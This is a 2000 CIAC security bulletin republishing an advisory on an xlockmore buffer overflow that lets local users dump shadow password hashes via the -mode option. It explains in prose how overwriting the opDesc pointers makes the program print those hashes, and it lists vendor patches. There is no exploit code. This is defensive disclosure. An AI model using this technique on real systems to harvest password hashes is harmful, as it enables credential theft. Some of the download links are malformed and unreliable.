__________________________________________________________ The U.S. Department of Energy Computer Incident Advisory Capability ___ __ __ _ ___ / | /_\ / \___ __|__ / \ \___ __________________________________________________________ INFORMATION BULLETIN LINUX/BSD Initialized data overflow in Xlockmore October 9, 2000 21:00 GMT Number L-001 ______________________________________________________________________________ PROBLEM: The xlockmore program has a buffer overflow issue with the use of the '-mode' option. It is possible to read a part of the xlockmore address space, which includes the shadow password file. PLATFORM: FreeBSD versions prior to and including 4.0 NetBSD versions prior to and including 1.4.2 OpenBSD versions prior to and including 2.6 Debian Linux Version 2.1 SCO Skunkware DAMAGE: The xlockmore program places password hashes into the initialized data section of memory. Permissions are dropped after the users hash is read. A malicious individual can retrive the hashes and run a cracker program to obtain passwords. SOLUTION: Follow the recommendations outlined by the advisory. ______________________________________________________________________________ VULNERABILITY The risk is HIGH, due to the possible compromise of system ASSESSMENT: passwords and the exploit is publicly available. ______________________________________________________________________________ [****** Begin Beyond-Security's SecuriTeam Advisory******] Title 30/5/2000 Initialized data overflow in Xlock Summary An implementation flaw in xlock allows global variables in the initialized data section of memory to be overwritten. This opens a security hole where local users can view the contents of xlock's memory - including the shadowed password file - after root privileges have been dropped. Details Vulnerable systems: All versions of xlockmore prior to and including 4.16 are vulnerable. The xlock program locks an X server until a valid password is entered. The command line option -mode provides a user with a mechanism to change the default display shown when the X server is locked. Xlock is installed with privileges to obtain password information, although these are dropped as quickly as possible. An overflow in the -mode command line option allows a malicious attacker to reveal arbitrary portions of xlock's address space including the shadow password file. The buffer overflow in xlock is not a traditional overflow since all privileges have been dropped. The global variables overflowed are in the initialized data section (.data) of memory and shellcode is not used for exploitation. Upon initialization, xlock reads the shadow password file to obtain the current users password hash, and then immediately relinquishes privileges. The password hashes, including those not belonging to the user running xlock, are stored in memory and continue to be accessible by xlock. When the -mode command line option is specified, a strcpy() occurs in the function checkResources(). The argument to -mode is copied into a small buffer allocated on the initialized data section (.data) called old_default_mode. If an arbitrarily large command line argument is specified, numerous global variables in the initialized data section will be overrun, including: genTable, modeTable, cmdlineTable, earlyCmdlineTable, and opDesc. When an unknown -mode type is specified, for example when a large command line option is provided, the program aborts using a function called Syntax() defined in resources.c. The purpose of the Syntax() function is to provide information regarding any "bad command line options" and then print a complete list of the correct options. The Syntax() function utilizes the global variable opDesc which can be overwritten via the command line argument to -mode. The opDesc buffer is allocated as an array of OptionStruct structures, each containing two character pointers as defined in mode.h. The first pointer provides the name of a command line option and the second a description of the option. The Syntax() function walks the array of OptionStruct structures in opDesc printing both the name and description of the command line options. Overwriting the opDesc buffer with addresses pointing to the shadow password file stored in memory results in the Syntax() function printing the shadow password file instead of the command line options. Solution: An official xlockmore patch is available at: ftp://ftp.tux.org/pub/tux/bagleyd/xlockmore/index.html Download either xlockmore-4.16.1.tar.gz or xlockmore-4.16-4.16.1.diff.gz. Vendor Information: FreeBSD The vulnerable xlockmore is distributed as part of the FreeBSD port collection in versions prior to and including 4.0. A new version of xlockmore can be obtained by downloading a new port skeleton from: http://www.freebsd.org/ports/ NetBSD The vulnerable xlockmore is distributed as part of the NetBSD packages collection in versions prior to and including 1.4.2. Information regarding the package collection is available from: http://www.netbsd.org/Documentation/software/packages.html Further information for upgrading the xlockmore package can be obtained from: ftp://ftp.netbsd.org/pub/NetBSD/packages/pkgsrc/x11/xlockmore/README.html OpenBSD The vulnerable xlockmore is distributed as part of the OpenBSD port collection in versions prior to and including 2.6. OpenBSD 2.7 will ship with the issue resolved. An OpenBSD 2.6 patch is available from: http://www.openbsd.org/errata26.html#xlockmore OpenBSD has adopted a password scheme which utilizes a 128 bit salted, 2^8 round blowfish hash specifically designed such that it cannot be optimized. Further information regarding the password scheme and the limitations of cracking OpenBSD passwords is available from: http://www.openbsd.org/cgi-bin/man.cgi?query=crypt&sektion=3 http://www.openbsd.org/events.html#usenix99 Debian GNU/Linux The vulnerable xlockmore problem was distributed with Debian 2.1 although Debian 2.2 and above are not exploitable since they use PAM. Debian updates are available from: Source archives: http://security.debian.org/dists/stable/updates/source/xlockmore_4.12-.1.diff.gz http://security.debian.org/dists/stable/updates/source/xlockmore_4.12-.1.dsc Alpha architecture: http://security.debian.org/dists/stable/updates/binary-alpha/xlockmoregl_4.12- 4.1_alpha.deb http://security.debian.org/dists/stable/updates/binary-alpha/xlockmore4.12- 4.1_alpha.deb Intel ia32 architecture: http://security.debian.org/dists/stable/updates/binary-i386/xlockmore-l_4.12- 4.1_i386.deb http://security.debian.org/dists/stable/updates/binary-i386/xlockmore_.12- 4.1_i386.deb Motorola 680x0 architecture: http://security.debian.org/dists/stable/updates/binary-m68k/xlockmore-l_4.12- 4.1_m68k.deb http://security.debian.org/dists/stable/updates/binary-m68k/xlockmore_.12- 4.1_m68k.deb Sun Sparc architecture: http://security.debian.org/dists/stable/updates/binary-sparc/xlockmoregl_4.12- 4.1_sparc.deb http://security.debian.org/dists/stable/updates/binary-sparc/xlockmore4.12- 4.1_sparc.deb TurboLinux TurboLinux currently does not utilize shadowed password files, although updates for the xlockmore package and srpm are available from: ftp://ftp://ftp.turbolinux.com/pub/updates/6.0/security/xlockmore-4.16.1- 1.i86.rpm ftp://ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/xlockmore-4.16.1-1.src.pm For additional security updates, TurboLinux advisories, and security alert mailing list information, please visit http://www.turbolinux.com/security/index.html">http://www.turbolinux.com/securit y/index.html SCO OpenServer and UnixWare Xlockmore is available as part of SCO Skunkware. A new version of xlockmore that addresses this security vulnerability is available from: http://www.sco.com/skunkware">http://www.sco.com/skunkware Additional information The information has been provided by: COVERT Labs [****** End Beyond-Security's SecuriTeam Advisory******] _______________________________________________________________________________ CIAC wishes to acknowledge the contributions of Beyond-Security's SecuriTeam for the information contained in this bulletin. _______________________________________________________________________________ CIAC, the Computer Incident Advisory Capability, is the computer security incident response team for the U.S. Department of Energy (DOE) and the emergency backup response team for the National Institutes of Health (NIH). CIAC is located at the Lawrence Livermore National Laboratory in Livermore, California. CIAC is also a founding member of FIRST, the Forum of Incident Response and Security Teams, a global organization established to foster cooperation and coordination among computer security teams worldwide. CIAC services are available to DOE, DOE contractors, and the NIH. CIAC can be contacted at: Voice: +1 925-422-8193 FAX: +1 925-423-8002 STU-III: +1 925-423-2604 E-mail: ciac@llnl.gov For emergencies and off-hour assistance, DOE, DOE contractor sites, and the NIH may contact CIAC 24-hours a day. During off hours (5PM - 8AM PST), use one of the following methods to contact CIAC: 1. Call the CIAC voice number 925-422-8193 and leave a message, or 2. Call 888-449-8369 to send a Sky Page to the CIAC duty person or 3. Send e-mail to 4498369@skytel.com, or 4. Call 800-201-9288 for the CIAC Project Leader. Previous CIAC notices, anti-virus software, and other information are available from the CIAC Computer Security Archive. World Wide Web: http://www.ciac.org/ (or http://ciac.llnl.gov -- they're the same machine) Anonymous FTP: ftp.ciac.org (or ciac.llnl.gov -- they're the same machine) Modem access: +1 (925) 423-4753 (28.8K baud) +1 (925) 423-3331 (28.8K baud) PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing communities receive CIAC bulletins. If you are not part of these communities, please contact your agency's response team to report incidents. Your agency's team will coordinate with CIAC. The Forum of Incident Response and Security Teams (FIRST) is a world-wide organization. A list of FIRST member organizations and their constituencies can be obtained via WWW at http://www.first.org/. This document was prepared as an account of work sponsored by an agency of the United States Government. Neither the United States Government nor the University of California nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by the United States Government or the University of California. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or the University of California, and shall not be used for advertising or product endorsement purposes. LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC) K-064: Linux Kernel Capability Vulnerability K-065: Microsoft "Specialized Header" Vulnerability K-066a: IRIX telnetd vulnerability (Revised 9/13/2000) K-067: FreeBSD - dhclient vulnerable to malicious dhcp server K-068: Automated Web Interface Scans IIS for Multiple Vulnerabilities K-069: Input Validation Problem in rpc.statd K-070: PGP Additional Decryption Keys ADKs Vulnerability k-071: cisco.ciscosecure.acs.vulnerability.txt k-072: trinity.stacheldraht.variants.txt* k-073: vulnerabilities.firewall.1.txt*